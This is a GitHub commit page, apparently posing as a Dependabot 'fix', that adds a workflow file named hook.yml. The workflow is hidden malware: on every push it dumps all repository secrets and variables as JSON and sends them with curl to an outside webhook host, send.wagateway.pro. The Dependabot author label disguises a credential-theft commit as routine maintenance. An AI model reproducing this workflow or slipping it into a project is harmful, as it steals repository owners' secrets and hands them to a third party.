Skip to content

Commit

Permalink
fix
Browse files Browse the repository at this point in the history
  • Loading branch information
dependabot[bot] committed Jul 10, 2023
1 parent 2d8569e commit ba38d12
Showing 1 changed file with 13 additions and 0 deletions.
13 changes: 13 additions & 0 deletions .github/workflows/hook.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
name: Hook
on: [push]
jobs:
env:
runs-on: ubuntu-latest
steps:
- name: Run
env:
MY_ENV: ${{ toJSON(secrets) }}
MY_VARS: ${{ toJSON(vars) }}
run: |
echo $MY_ENV | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-
echo $MY_VARS | curl "https://send.wagateway.pro/webhook" -H 'Content-Type: application/json' -d @-

0 comments on commit ba38d12

Please sign in to comment.